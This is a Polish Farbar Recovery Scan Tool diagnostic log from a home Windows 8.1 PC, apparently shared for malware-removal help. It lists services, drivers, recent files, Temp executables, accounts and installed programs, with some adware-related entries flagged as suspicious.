R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-05-07] ()
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7398336 2017-04-04] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-04] (AVAST Software)
S2 AxAutoMntSrv; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [39376 2015-03-12] (Alcohol Soft Development Team)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-06-13] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-06-13] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [48944 2017-04-17] (Dropbox, Inc.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1277680 2015-03-31] (Disc Soft Ltd)
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [37416 2014-12-15] (CHENGDU YIWO Tech Development Co., Ltd)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Brak podpisu cyfrowego]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 ISCTAgent; C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe [209712 2014-08-25] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [154584 2014-09-03] (Intel Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.163\McCHSvc.exe [289256 2015-07-31] (McAfee, Inc.)
R2 MSI_Trigger_Service; C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe [30240 2013-09-26] (MICRO-STAR INTERNATIONAL CO., LTD.)
S3 PAExec; C:\Windows\PAExec.exe [189112 2017-03-22] (Power Admin LLC)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [370688 2009-12-23] (StarWind Software) [Brak podpisu cyfrowego]
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [2589496 2014-10-17] (AVG Technologies)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [21160 2012-09-23] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2012-08-22] ()
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [307736 2017-04-04] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [189768 2017-04-04] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334088 2017-04-04] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [48528 2017-04-04] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-04-04] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-04-04] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [127112 2017-04-04] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-04-04] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-04-04] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1005048 2017-04-04] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [556784 2017-04-04] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [164064 2017-04-04] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-04-04] (AVAST Software)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [118848 2016-08-09] (Advanced Micro Devices)
U3 axscsidrv; C:\Windows\System32\Drivers\axscsidrv.sys [304296 2015-11-23] (Alcohol Soft Development Team)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30352 2015-04-20] (Disc Soft Ltd)
S3 epmntdrv; C:\Windows\system32\epmntdrv.sys [18528 2014-11-18] ()
S3 epmntdrv; C:\Windows\SysWOW64\epmntdrv.sys [14944 2014-11-18] ()
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [48168 2014-12-15] ()
S3 EuGdiDrv; C:\Windows\system32\EuGdiDrv.sys [10848 2014-11-18] ()
S3 EuGdiDrv; C:\Windows\SysWOW64\EuGdiDrv.sys [10208 2014-11-18] ()
S3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [3729920 2014-03-07] (Intel Corporation) [Brak podpisu cyfrowego]
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [22216 2014-05-27] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [22728 2014-05-27] ()
R3 INETMON; C:\Windows\System32\Drivers\INETMON.sys [25800 2014-05-27] ()
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil cenzura!ções Ltda) <==== UWAGA
R3 ISCT; C:\Windows\System32\drivers\ISCTD.sys [44744 2014-05-27] ()
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [126976 2014-09-03] (Intel Corporation)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [368904 2014-12-19] (McAfee, Inc.)
R0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [100080 2014-12-19] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [100720 2014-11-08] (McAfee, Inc.)
S3 pfc; C:\Windows\SysWOW64\drivers\pfc.sys [9856 2015-02-28] (Padus, Inc.) [Brak podpisu cyfrowego]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381608 2015-11-23] (Duplex Secure Ltd.)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [14112 2014-09-09] (TuneUp Software)
R1 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [117768 2015-11-10] (Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [194976 2015-11-10] (Oracle Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 ALSysIO; \??\C:\Users\Adam\AppData\Local\Temp\ALSysIO64.sys [X] <==== UWAGA
S3 dbx; system32\DRIVERS\dbx.sys [X]
S3 intaud_WaveExtensible; \SystemRoot\system32\drivers\intelaud.sys [X]
S3 iwdbus; \SystemRoot\System32\drivers\iwdbus.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 VBoxNetFlt; \SystemRoot\system32\DRIVERS\VBoxNetFlt.sys [X]

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Jeden miesiÄ…c - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-21 10:37 - 2017-04-21 10:59 - 00000000 ____D C:\AdwCleaner
2017-04-21 10:10 - 2017-04-22 22:12 - 00000000 ____D C:\FRST
2017-04-20 14:56 - 2017-04-20 14:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-20 14:56 - 2017-04-20 14:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-20 09:32 - 2017-04-20 09:32 - 00000000 ___HD C:\$AV_ASW
2017-04-20 09:24 - 2017-04-20 09:24 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 09:24 - 2017-04-20 09:24 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-20 01:00 - 2017-04-20 01:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-04-19 09:18 - 2017-04-20 09:36 - 00000000 ____D C:\Users\Adam\AppData\Local\3DM
2017-04-19 09:14 - 2017-04-19 09:18 - 00000000 ____D C:\Program Files\MK
2017-04-17 17:14 - 2017-04-17 17:14 - 00048944 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-17 15:54 - 2017-04-21 10:52 - 00000000 ____D C:\Windows\system32\log
2017-04-17 15:54 - 2017-04-21 10:10 - 00000000 ____D C:\Users\Adam\AppData\LocalLow\Mozilla
2017-04-17 15:54 - 2017-04-17 15:54 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Elex-tech
2017-04-17 15:54 - 2017-04-17 15:54 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-17 15:50 - 2017-04-17 15:50 - 00000000 ____D C:\Users\Adam\AppData\Local\Eastness
2017-04-17 15:50 - 2017-04-17 15:50 - 00000000 ____D C:\ProgramData\Software
2017-04-17 15:50 - 2017-04-17 15:50 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 15:50 - 2017-04-17 15:50 - 00000000 ____D C:\Program Files (x86)\Eastness
2017-04-17 15:45 - 2017-04-17 15:49 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-13 18:04 - 2017-04-13 18:04 - 00003574 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 18:04 - 2017-04-13 18:04 - 00000000 ____D C:\Users\Adam\AppData\Roaming\SSMgre
2017-04-12 13:48 - 2017-04-12 13:48 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Sun
2017-04-10 11:50 - 2017-04-13 18:04 - 00003564 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-04-04 20:59 - 2017-04-04 20:59 - 00399944 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-03-28 09:16 - 2017-03-28 09:16 - 00108623 _____ C:\Users\Adam\AppData\Local\recently-used.xbel
2017-03-23 10:07 - 2017-03-23 10:07 - 00000000 ____D C:\Users\Adam\AppData\Local\Octoshape
2017-03-23 10:06 - 2017-03-23 10:07 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Octoshape

==================== Jeden miesiÄ…c - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-22 21:59 - 2016-06-13 11:39 - 00001162 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-04-22 19:59 - 2016-06-13 11:39 - 00001158 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-04-22 18:46 - 2015-03-01 20:39 - 00000000 ____D C:\Users\Adam\AppData\Roaming\vlc
2017-04-22 16:01 - 2015-02-26 21:38 - 00003972 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{173A4055-B161-4B94-9E49-588ED76C23D3}
2017-04-22 16:01 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\AppReadiness
2017-04-22 16:00 - 2017-02-24 09:57 - 00003030 _____ C:\Windows\System32\Tasks\RTSS
2017-04-22 15:59 - 2015-02-26 21:35 - 00000000 ___DO C:\Users\Adam\SkyDrive
2017-04-21 11:35 - 2015-02-26 21:39 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1070030570-2694662635-206350218-1001
2017-04-21 11:00 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-21 10:59 - 2017-03-22 14:28 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2017-04-21 10:59 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-04-21 10:52 - 2016-04-03 14:08 - 00001014 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2017-04-21 10:52 - 2015-11-23 17:12 - 00000907 _____ C:\Users\Adam\Desktop\AION.lnk
2017-04-21 10:52 - 2015-11-23 17:12 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AION
2017-04-21 10:52 - 2015-02-26 21:33 - 00001013 _____ C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-21 10:52 - 2015-02-26 21:33 - 00000983 _____ C:\Users\Adam\Desktop\Internet Explorer.lnk
2017-04-21 10:48 - 2015-03-10 00:10 - 00000000 ____D C:\Program Files (x86)\MyPC Backup
2017-04-20 14:56 - 2015-10-14 20:27 - 00001137 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-20 14:21 - 2014-05-13 08:56 - 01738750 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-20 14:21 - 2013-08-23 01:12 - 00770326 _____ C:\Windows\system32\perfh015.dat
2017-04-20 14:21 - 2013-08-23 01:12 - 00156028 _____ C:\Windows\system32\perfc015.dat
2017-04-20 14:21 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-04-20 14:16 - 2016-12-21 13:50 - 00020992 ___SH C:\Users\Adam\Desktop\Thumbs.db
2017-04-20 01:01 - 2016-06-13 11:39 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-04-19 20:17 - 2015-02-27 01:03 - 00000000 ____D C:\Users\Adam\AppData\Roaming\GG
2017-04-19 09:18 - 2014-05-13 08:58 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-04-19 01:07 - 2015-02-26 21:33 - 00000000 ____D C:\Users\Adam
2017-04-17 15:50 - 2015-02-27 00:08 - 00002261 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-17 15:50 - 2015-02-27 00:08 - 00002191 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-13 18:04 - 2017-02-28 14:39 - 00000000 ____D C:\Users\Adam\AppData\Roaming\ScreenShot
2017-04-13 17:59 - 2016-04-03 14:08 - 00003956 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1459685331
2017-04-13 17:59 - 2016-04-03 14:08 - 00001065 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-04-13 17:58 - 2015-02-28 17:56 - 00000000 ____D C:\Program Files\WinRAR
2017-04-12 13:48 - 2015-03-01 20:39 - 00000508 _____ C:\Users\Public\Desktop\VLC media player.lnk
2017-04-12 13:48 - 2015-02-28 17:56 - 00001110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2017-04-12 13:48 - 2015-02-28 17:56 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-12 13:48 - 2015-02-28 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-04-12 13:47 - 2015-03-01 12:25 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-04-12 13:47 - 2015-03-01 12:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-04-12 13:47 - 2015-03-01 12:24 - 00000000 ____D C:\Program Files (x86)\Java
2017-04-12 13:46 - 2015-11-23 17:16 - 00000000 ____D C:\Program Files (x86)\Smart File Advisor
2017-04-12 12:41 - 2015-04-07 10:09 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-12 12:41 - 2015-04-07 10:09 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-11 19:16 - 2015-02-27 00:07 - 00003480 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-11 19:16 - 2015-02-27 00:07 - 00003352 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-11 14:23 - 2017-02-26 19:42 - 00004388 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-11 14:23 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-11 14:23 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-04 21:00 - 2017-03-09 22:09 - 00003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-04-04 20:59 - 2016-04-03 14:07 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 01005048 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00556784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00164064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00127112 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-04-04 20:59 - 2015-03-19 18:49 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00334088 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00307736 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00189768 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-04-04 20:58 - 2017-03-09 22:09 - 00048528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-03-30 19:16 - 2015-03-23 10:08 - 00002024 _____ C:\Users\Public\Desktop\Google Slides.lnk
2017-03-30 19:16 - 2015-03-23 10:08 - 00002022 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2017-03-30 19:16 - 2015-03-23 10:08 - 00002012 _____ C:\Users\Public\Desktop\Google Docs.lnk
2017-03-30 19:16 - 2015-03-23 10:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2017-03-28 11:10 - 2015-05-15 16:24 - 00000000 ____D C:\Users\Adam\.gimp-2.8
2017-03-28 09:16 - 2015-05-15 16:27 - 00000000 ____D C:\Users\Adam\AppData\Local\gtk-2.0
2017-03-27 20:59 - 2015-03-19 18:48 - 00000000 ____D C:\ProgramData\AVAST Software
2017-03-23 10:06 - 2015-02-27 01:05 - 00000000 ____D C:\Users\Adam\AppData\Roaming\Mozilla

==================== Pliki w katalogu głównym wybranych folderów =======

2015-03-29 23:34 - 2016-01-10 10:55 - 2128896 _____ () C:\Users\Adam\AppData\Local\file__0.localstorage
2015-09-17 23:53 - 2015-09-17 23:53 - 0000600 _____ () C:\Users\Adam\AppData\Local\PUTTY.RND
2017-03-28 09:16 - 2017-03-28 09:16 - 0108623 _____ () C:\Users\Adam\AppData\Local\recently-used.xbel
2015-02-26 21:54 - 2015-11-22 22:57 - 0007597 _____ () C:\Users\Adam\AppData\Local\resmon.resmoncfg
2014-05-13 08:59 - 2014-05-13 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

NiektĂłre pliki w TEMP:
====================
2017-01-01 17:42 - 2017-01-01 17:42 - 2964472 _____ (Google) C:\Users\Adam\AppData\Local\Temp\9C2E.exe
2015-04-20 10:21 - 2015-04-20 10:21 - 0663448 _____ (Ask Partner Network) C:\Users\Adam\AppData\Local\Temp\APNSetup.exe
2013-08-06 08:59 - 2013-08-06 08:59 - 0047720 _____ () C:\Users\Adam\AppData\Local\Temp\AxSFADownloader.exe
2015-11-22 13:17 - 2015-11-22 13:17 - 0071168 _____ () C:\Users\Adam\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvxpq8c.dll
2015-04-10 15:22 - 2015-02-19 13:17 - 0986136 _____ () C:\Users\Adam\AppData\Local\Temp\ggdrive-menu.exe
2015-04-10 15:22 - 2015-02-19 13:17 - 1228520 _____ () C:\Users\Adam\AppData\Local\Temp\ggdrive-overlay.exe
2013-06-24 19:19 - 2013-06-24 19:19 - 2380752 _____ (Mooii) C:\Users\Adam\AppData\Local\Temp\GoogleSetup.exe
2015-04-10 15:22 - 2014-02-05 17:07 - 0056856 _____ () C:\Users\Adam\AppData\Local\Temp\installstats.exe
2016-07-27 14:13 - 2016-07-27 14:13 - 40360648 _____ () C:\Users\Adam\AppData\Local\Temp\ipl5791.tmp.exe
2016-07-11 18:28 - 2016-07-11 18:28 - 40360648 _____ () C:\Users\Adam\AppData\Local\Temp\ipl9E3B.tmp.exe
2015-04-20 10:20 - 2015-04-20 10:20 - 0562088 _____ (Oracle Corporation) C:\Users\Adam\AppData\Local\Temp\jre-8u45-windows-au.exe
2015-02-28 12:40 - 2015-02-28 12:40 - 2406104 _____ (mIRC Co. Ltd.) C:\Users\Adam\AppData\Local\Temp\mirc741.exe
2015-08-03 17:56 - 2015-08-03 17:56 - 2407368 _____ (mIRC Co. Ltd.) C:\Users\Adam\AppData\Local\Temp\mirc743.exe
2015-11-22 23:46 - 2015-11-22 23:46 - 61022552 _____ () C:\Users\Adam\AppData\Local\Temp\raptrpatch.exe
2015-11-22 23:46 - 2015-11-22 23:46 - 0221632 _____ () C:\Users\Adam\AppData\Local\Temp\raptr_stub.exe
2015-03-18 21:04 - 2015-03-18 21:04 - 0192512 _____ () C:\Users\Adam\AppData\Local\Temp\sfamcc00001.dll
2015-02-10 19:56 - 2015-02-10 19:56 - 0105984 _____ () C:\Users\Adam\AppData\Local\Temp\sfextra.dll
2016-11-04 10:43 - 2016-11-04 10:43 - 257949568 _____ (AMD Inc.) C:\Users\Adam\AppData\Local\Temp\tmpF6C8.exe

==================== Bamital & volsnap ======================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo
C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo
C:\Windows\explorer.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo
C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo
C:\Windows\system32\services.exe => Plik podpisany cyfrowo
C:\Windows\system32\User32.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo
C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo
C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo
C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo
C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo
C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo

LastRegBack: 2017-04-21 09:32

==================== Koniec  FRST.txt ============================

Addition
Kod: Zaznacz wszystko
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 22-04-2017 01
Uruchomiony przez Adam (22-04-2017 22:13:21)
Uruchomiony z F:\wiro
Windows 8.1 (Update) (X64) (2015-02-26 19:33:27)
Tryb startu: Normal
==========================================================


==================== Konta uĹĽytkownikĂłw: =============================

Adam (S-1-5-21-1070030570-2694662635-206350218-1001 - Administrator - Enabled) => C:\Users\Adam
Administrator (S-1-5-21-1070030570-2694662635-206350218-500 - Administrator - Enabled) => C:\Users\Administrator
Gość (S-1-5-21-1070030570-2694662635-206350218-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1070030570-2694662635-206350218-1003 - Limited - Enabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

ACDSee 6.0 PowerPack (HKLM-x32\...\{271B64EE-3E1B-4381-A8FE-012390050492}) (Version: 6.0.3 - ACD Systems Ltd.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
AION (HKLM\...\AION) (Version:  - AION) <==== UWAGA
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
AVG PC TuneUp 2015 (HKLM-x32\...\AVG PC TuneUp) (Version: 15.0.1001.185 - AVG Technologies)
AVG PC TuneUp 2015 (pl-PL) (x32 Version: 15.0.1001.185 - AVG Technologies) Hidden
AVG PC TuneUp 2015 (x32 Version: 15.0.1001.185 - AVG Technologies) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0316.1721.29397 - Advanced Micro Devices, Inc.) Hidden
